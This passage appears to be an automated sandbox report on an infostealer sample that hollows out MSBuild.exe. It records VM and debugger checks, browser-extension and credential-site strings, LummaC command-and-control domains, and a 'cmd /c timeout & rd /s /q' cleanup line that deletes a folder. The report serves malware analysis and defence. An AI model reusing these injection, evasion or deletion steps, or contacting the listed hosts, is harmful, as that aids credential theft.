Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00410DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EC3h

5_2_00410DB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00369ABF FindFirstFileExW,	4_2_00369ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00416013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	5_2_0041547D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00409CF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	5_2_00414D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_0040D59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	5_2_0040B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	5_2_0040BF22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_0040B914
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	5_2_00415B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	5_2_0040CD0C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002E9ABF FindFirstFileExW,	15_2_002E9ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

5_2_00415182

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00410F8F GetSystemInfo,wsprintfA,

5_2_00410F8F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: CGIDGC.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: CGIDGC.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: CGIDGC.5.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: CGIDGC.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000001062000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CGIDGC.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: CGIDGC.5.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware.
Source: CGIDGC.5.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: MSBuild.exe, 00000010.00000002.1787833590.000000000138C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhq<
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: CGIDGC.5.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: CGIDGC.5.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000001028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`t
Source: CGIDGC.5.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: CGIDGC.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: CGIDGC.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: CGIDGC.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: CGIDGC.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: CGIDGC.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: CGIDGC.5.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: CGIDGC.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: CGIDGC.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: CGIDGC.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: CGIDGC.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Code function: 4_2_00357922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00357922

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

5_2_00418ADE

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00352003 mov edi, dword ptr fs:[00000030h]	4_2_00352003
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0037E37A mov eax, dword ptr fs:[00000030h]	4_2_0037E37A
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0037E362 mov eax, dword ptr fs:[00000030h]	4_2_0037E362
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0037E385 mov eax, dword ptr fs:[00000030h]	4_2_0037E385
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_003955FE mov eax, dword ptr fs:[00000030h]	4_2_003955FE
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0036A64C mov eax, dword ptr fs:[00000030h]	4_2_0036A64C
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00360F2E mov ecx, dword ptr fs:[00000030h]	4_2_00360F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_004014AD mov eax, dword ptr fs:[00000030h]	5_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040148A mov eax, dword ptr fs:[00000030h]	5_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_004014A2 mov eax, dword ptr fs:[00000030h]	5_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00418725 mov eax, dword ptr fs:[00000030h]	5_2_00418725
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00418726 mov eax, dword ptr fs:[00000030h]	5_2_00418726
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D2003 mov edi, dword ptr fs:[00000030h]	15_2_002D2003
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002EA64C mov eax, dword ptr fs:[00000030h]	15_2_002EA64C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002E0F2E mov ecx, dword ptr fs:[00000030h]	15_2_002E0F2E

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Code function: 4_2_0036CC4B GetProcessHeap,

4_2_0036CC4B

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00357610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00357610
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00357922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00357922
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_0035DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0035DA73
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00357AAF SetUnhandledExceptionFilter,	4_2_00357AAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0041D1A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041DB1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_0041DB1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_004277BE SetUnhandledExceptionFilter,	5_2_004277BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D34AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6D34AC62
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_002D7610
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_002D7922
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002DDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_002DDA73
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002D7AAF SetUnhandledExceptionFilter,	15_2_002D7AAF

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: VmRHSCaiyc.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6192, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_0040F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

5_2_0040F51F

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior

LummaC encrypted strings found

Source: HCFIIIJJKJ.exe	String found in binary or memory: isoplethui.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: frizzettei.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: exemplarou.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: wickedneatr.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: invinjurhey.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: laddyirekyi.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: exilepolsiy.sbs
Source: HCFIIIJJKJ.exe	String found in binary or memory: bemuzzeki.sbs

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		5_2_0041247D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00412554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		5_2_00412554

Writes to foreign memory regions

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D8C008	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1195008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\HCFIIIJJKJ.exe "C:\ProgramData\HCFIIIJJKJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KKEHIEBKJKFI" & exit	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_6D394760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

5_2_6D394760

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_6D271C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

5_2_6D271C30

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Code function: 4_2_0037E013 cpuid

4_2_0037E013

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	4_2_0036C085
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetLocaleInfoW,	4_2_0036622B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: EnumSystemLocalesW,	4_2_0036C327
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: EnumSystemLocalesW,	4_2_0036C372
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: EnumSystemLocalesW,	4_2_0036C40D
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,	4_2_003A244B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_0036C498
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_003A45DE
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetLocaleInfoW,	4_2_0036C6EB
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_0036C814
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetLocaleInfoW,	4_2_0036C91A
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_0036C9E9
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	4_2_003A6AB8
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	4_2_003A7BA8
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: EnumSystemLocalesW,	4_2_00365D7F
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	4_2_003A6DD6
